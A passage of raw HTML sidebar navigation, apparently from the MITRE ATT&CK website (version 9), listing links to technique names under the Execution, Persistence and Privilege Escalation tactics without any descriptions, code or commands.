href="/versions/v9/techniques/T1059/"> Command and Scripting Interpreter </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1059-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1059-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1059-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1059-body" aria-labelledby="enterprise-TA0002-T1059-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.001"> <a href="/versions/v9/techniques/T1059/001/"> PowerShell </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.002"> <a href="/versions/v9/techniques/T1059/002/"> AppleScript </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.003"> <a href="/versions/v9/techniques/T1059/003/"> Windows Command Shell </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.004"> <a href="/versions/v9/techniques/T1059/004/"> Unix Shell </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.005"> <a href="/versions/v9/techniques/T1059/005/"> Visual Basic </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.006"> <a href="/versions/v9/techniques/T1059/006/"> Python </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.007"> <a href="/versions/v9/techniques/T1059/007/"> JavaScript </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.008"> <a href="/versions/v9/techniques/T1059/008/"> Network Device CLI </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1609"> <a href="/versions/v9/techniques/T1609/"> Container Administration Command </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0002-T1610"> <a href="/versions/v9/techniques/T1610/"> Deploy Container </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1203"> <a href="/versions/v9/techniques/T1203/"> Exploitation for Client Execution </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1559"> <a href="/versions/v9/techniques/T1559/"> Inter-Process Communication </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1559-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1559-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1559-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1559-body" aria-labelledby="enterprise-TA0002-T1559-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1559-T1559.001"> <a href="/versions/v9/techniques/T1559/001/"> Component Object Model </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1559-T1559.002"> <a href="/versions/v9/techniques/T1559/002/"> Dynamic Data Exchange </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1106"> <a href="/versions/v9/techniques/T1106/"> Native API </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1053"> <a href="/versions/v9/techniques/T1053/"> Scheduled Task/Job </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1053-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1053-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1053-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1053-body" aria-labelledby="enterprise-TA0002-T1053-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.001"> <a href="/versions/v9/techniques/T1053/001/"> At (Linux) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0002-T1053-T1053.002"> <a href="/versions/v9/techniques/T1053/002/"> At (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.003"> <a href="/versions/v9/techniques/T1053/003/"> Cron </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.004"> <a href="/versions/v9/techniques/T1053/004/"> Launchd </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.005"> <a href="/versions/v9/techniques/T1053/005/"> Scheduled Task </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.006"> <a href="/versions/v9/techniques/T1053/006/"> Systemd Timers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.007"> <a href="/versions/v9/techniques/T1053/007/"> Container Orchestration Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1129"> <a href="/versions/v9/techniques/T1129/"> Shared Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1072"> <a href="/versions/v9/techniques/T1072/"> Software Deployment Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1569"> <a href="/versions/v9/techniques/T1569/"> System Services </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1569-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1569-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1569-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1569-body" aria-labelledby="enterprise-TA0002-T1569-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1569-T1569.001"> <a href="/versions/v9/techniques/T1569/001/"> Launchctl </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0002-T1569-T1569.002"> <a href="/versions/v9/techniques/T1569/002/"> Service Execution </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1204"> <a href="/versions/v9/techniques/T1204/"> User Execution </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1204-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1204-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1204-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1204-body" aria-labelledby="enterprise-TA0002-T1204-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1204-T1204.001"> <a href="/versions/v9/techniques/T1204/001/"> Malicious Link </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1204-T1204.002"> <a href="/versions/v9/techniques/T1204/002/"> Malicious File </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1204-T1204.003"> <a href="/versions/v9/techniques/T1204/003/"> Malicious Image </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1047"> <a href="/versions/v9/techniques/T1047/"> Windows Management Instrumentation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003"> <a href="/versions/v9/tactics/TA0003"> Persistence </a> <div class="expand-button collapsed" id="enterprise-TA0003-header" data-toggle="collapse" data-target="#enterprise-TA0003-body" aria-expanded="false" aria-controls="#enterprise-TA0003-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-body" aria-labelledby="enterprise-TA0003-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1098"> <a href="/versions/v9/techniques/T1098/"> Account Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1098-header" 
data-toggle="collapse" data-target="#enterprise-TA0003-T1098-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1098-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1098-body" aria-labelledby="enterprise-TA0003-T1098-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.001"> <a href="/versions/v9/techniques/T1098/001/"> Additional Cloud Credentials </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.002"> <a href="/versions/v9/techniques/T1098/002/"> Exchange Email Delegate Permissions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.003"> <a href="/versions/v9/techniques/T1098/003/"> Add Office 365 Global Administrator Role </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.004"> <a href="/versions/v9/techniques/T1098/004/"> SSH Authorized Keys </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1197"> <a href="/versions/v9/techniques/T1197/"> BITS Jobs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1547"> <a href="/versions/v9/techniques/T1547/"> Boot or Logon Autostart Execution </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1547-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1547-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1547-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1547-body" aria-labelledby="enterprise-TA0003-T1547-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.001"> <a href="/versions/v9/techniques/T1547/001/"> Registry Run Keys / Startup Folder </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.002"> <a href="/versions/v9/techniques/T1547/002/"> 
Authentication Package </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.003"> <a href="/versions/v9/techniques/T1547/003/"> Time Providers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.004"> <a href="/versions/v9/techniques/T1547/004/"> Winlogon Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.005"> <a href="/versions/v9/techniques/T1547/005/"> Security Support Provider </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.006"> <a href="/versions/v9/techniques/T1547/006/"> Kernel Modules and Extensions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.007"> <a href="/versions/v9/techniques/T1547/007/"> Re-opened Applications </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.008"> <a href="/versions/v9/techniques/T1547/008/"> LSASS Driver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.009"> <a href="/versions/v9/techniques/T1547/009/"> Shortcut Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.010"> <a href="/versions/v9/techniques/T1547/010/"> Port Monitors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.011"> <a href="/versions/v9/techniques/T1547/011/"> Plist Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.012"> <a href="/versions/v9/techniques/T1547/012/"> Print Processors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.013"> <a href="/versions/v9/techniques/T1547/013/"> XDG Autostart Entries </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0003-T1547-T1547.014"> <a href="/versions/v9/techniques/T1547/014/"> Active Setup </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1037"> <a href="/versions/v9/techniques/T1037/"> Boot or Logon Initialization Scripts </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1037-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1037-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1037-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1037-body" aria-labelledby="enterprise-TA0003-T1037-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.001"> <a href="/versions/v9/techniques/T1037/001/"> Logon Script (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.002"> <a href="/versions/v9/techniques/T1037/002/"> Logon Script (Mac) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.003"> <a href="/versions/v9/techniques/T1037/003/"> Network Logon Script </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.004"> <a href="/versions/v9/techniques/T1037/004/"> RC Scripts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.005"> <a href="/versions/v9/techniques/T1037/005/"> Startup Items </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1176"> <a href="/versions/v9/techniques/T1176/"> Browser Extensions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1554"> <a href="/versions/v9/techniques/T1554/"> Compromise Client Software Binary </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1136"> <a href="/versions/v9/techniques/T1136/"> Create Account </a> <div 
class="expand-button collapsed" id="enterprise-TA0003-T1136-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1136-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1136-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1136-body" aria-labelledby="enterprise-TA0003-T1136-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1136-T1136.001"> <a href="/versions/v9/techniques/T1136/001/"> Local Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1136-T1136.002"> <a href="/versions/v9/techniques/T1136/002/"> Domain Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1136-T1136.003"> <a href="/versions/v9/techniques/T1136/003/"> Cloud Account </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1543"> <a href="/versions/v9/techniques/T1543/"> Create or Modify System Process </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1543-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1543-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1543-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1543-body" aria-labelledby="enterprise-TA0003-T1543-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.001"> <a href="/versions/v9/techniques/T1543/001/"> Launch Agent </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.002"> <a href="/versions/v9/techniques/T1543/002/"> Systemd Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.003"> <a href="/versions/v9/techniques/T1543/003/"> Windows Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.004"> <a href="/versions/v9/techniques/T1543/004/"> Launch 
Daemon </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1546"> <a href="/versions/v9/techniques/T1546/"> Event Triggered Execution </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1546-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1546-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1546-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1546-body" aria-labelledby="enterprise-TA0003-T1546-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.001"> <a href="/versions/v9/techniques/T1546/001/"> Change Default File Association </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.002"> <a href="/versions/v9/techniques/T1546/002/"> Screensaver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.003"> <a href="/versions/v9/techniques/T1546/003/"> Windows Management Instrumentation Event Subscription </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.004"> <a href="/versions/v9/techniques/T1546/004/"> Unix Shell Configuration Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.005"> <a href="/versions/v9/techniques/T1546/005/"> Trap </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.006"> <a href="/versions/v9/techniques/T1546/006/"> LC_LOAD_DYLIB Addition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.007"> <a href="/versions/v9/techniques/T1546/007/"> Netsh Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.008"> <a href="/versions/v9/techniques/T1546/008/"> Accessibility Features </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0003-T1546-T1546.009"> <a href="/versions/v9/techniques/T1546/009/"> AppCert DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.010"> <a href="/versions/v9/techniques/T1546/010/"> AppInit DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.011"> <a href="/versions/v9/techniques/T1546/011/"> Application Shimming </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.012"> <a href="/versions/v9/techniques/T1546/012/"> Image File Execution Options Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.013"> <a href="/versions/v9/techniques/T1546/013/"> PowerShell Profile </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.014"> <a href="/versions/v9/techniques/T1546/014/"> Emond </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.015"> <a href="/versions/v9/techniques/T1546/015/"> Component Object Model Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1133"> <a href="/versions/v9/techniques/T1133/"> External Remote Services </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1574"> <a href="/versions/v9/techniques/T1574/"> Hijack Execution Flow </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1574-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1574-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1574-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1574-body" aria-labelledby="enterprise-TA0003-T1574-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.001"> <a href="/versions/v9/techniques/T1574/001/"> DLL Search 
Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.002"> <a href="/versions/v9/techniques/T1574/002/"> DLL Side-Loading </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.004"> <a href="/versions/v9/techniques/T1574/004/"> Dylib Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.005"> <a href="/versions/v9/techniques/T1574/005/"> Executable Installer File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.006"> <a href="/versions/v9/techniques/T1574/006/"> Dynamic Linker Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.007"> <a href="/versions/v9/techniques/T1574/007/"> Path Interception by PATH Environment Variable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.008"> <a href="/versions/v9/techniques/T1574/008/"> Path Interception by Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.009"> <a href="/versions/v9/techniques/T1574/009/"> Path Interception by Unquoted Path </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.010"> <a href="/versions/v9/techniques/T1574/010/"> Services File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.011"> <a href="/versions/v9/techniques/T1574/011/"> Services Registry Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.012"> <a href="/versions/v9/techniques/T1574/012/"> COR_PROFILER </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1525"> <a 
href="/versions/v9/techniques/T1525/"> Implant Internal Image </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1556"> <a href="/versions/v9/techniques/T1556/"> Modify Authentication Process </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1556-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1556-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1556-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1556-body" aria-labelledby="enterprise-TA0003-T1556-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.001"> <a href="/versions/v9/techniques/T1556/001/"> Domain Controller Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.002"> <a href="/versions/v9/techniques/T1556/002/"> Password Filter DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.003"> <a href="/versions/v9/techniques/T1556/003/"> Pluggable Authentication Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.004"> <a href="/versions/v9/techniques/T1556/004/"> Network Device Authentication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1137"> <a href="/versions/v9/techniques/T1137/"> Office Application Startup </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1137-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1137-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1137-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1137-body" aria-labelledby="enterprise-TA0003-T1137-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.001"> <a href="/versions/v9/techniques/T1137/001/"> Office Template Macros </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.002"> <a href="/versions/v9/techniques/T1137/002/"> Office Test </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.003"> <a href="/versions/v9/techniques/T1137/003/"> Outlook Forms </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.004"> <a href="/versions/v9/techniques/T1137/004/"> Outlook Home Page </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.005"> <a href="/versions/v9/techniques/T1137/005/"> Outlook Rules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.006"> <a href="/versions/v9/techniques/T1137/006/"> Add-ins </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1542"> <a href="/versions/v9/techniques/T1542/"> Pre-OS Boot </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1542-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1542-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1542-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1542-body" aria-labelledby="enterprise-TA0003-T1542-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.001"> <a href="/versions/v9/techniques/T1542/001/"> System Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.002"> <a href="/versions/v9/techniques/T1542/002/"> Component Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.003"> <a href="/versions/v9/techniques/T1542/003/"> Bootkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.004"> <a href="/versions/v9/techniques/T1542/004/"> ROMMONkit </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.005"> <a href="/versions/v9/techniques/T1542/005/"> TFTP Boot </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1053"> <a href="/versions/v9/techniques/T1053/"> Scheduled Task/Job </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1053-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1053-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1053-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1053-body" aria-labelledby="enterprise-TA0003-T1053-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.001"> <a href="/versions/v9/techniques/T1053/001/"> At (Linux) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.002"> <a href="/versions/v9/techniques/T1053/002/"> At (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.003"> <a href="/versions/v9/techniques/T1053/003/"> Cron </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.004"> <a href="/versions/v9/techniques/T1053/004/"> Launchd </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.005"> <a href="/versions/v9/techniques/T1053/005/"> Scheduled Task </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.006"> <a href="/versions/v9/techniques/T1053/006/"> Systemd Timers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.007"> <a href="/versions/v9/techniques/T1053/007/"> Container Orchestration Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1505"> <a href="/versions/v9/techniques/T1505/"> Server Software Component </a> <div 
class="expand-button collapsed" id="enterprise-TA0003-T1505-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1505-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1505-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1505-body" aria-labelledby="enterprise-TA0003-T1505-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1505-T1505.001"> <a href="/versions/v9/techniques/T1505/001/"> SQL Stored Procedures </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1505-T1505.002"> <a href="/versions/v9/techniques/T1505/002/"> Transport Agent </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1505-T1505.003"> <a href="/versions/v9/techniques/T1505/003/"> Web Shell </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1205"> <a href="/versions/v9/techniques/T1205/"> Traffic Signaling </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1205-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1205-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1205-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1205-body" aria-labelledby="enterprise-TA0003-T1205-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1205-T1205.001"> <a href="/versions/v9/techniques/T1205/001/"> Port Knocking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1078-body" 
aria-labelledby="enterprise-TA0003-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004"> <a href="/versions/v9/tactics/TA0004"> Privilege Escalation </a> <div class="expand-button collapsed" id="enterprise-TA0004-header" data-toggle="collapse" data-target="#enterprise-TA0004-body" aria-expanded="false" aria-controls="#enterprise-TA0004-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-body" aria-labelledby="enterprise-TA0004-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1548"> <a href="/versions/v9/techniques/T1548/"> Abuse Elevation Control Mechanism </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1548-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1548-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1548-body"></div> </div> <div class="sidenav-body collapse" 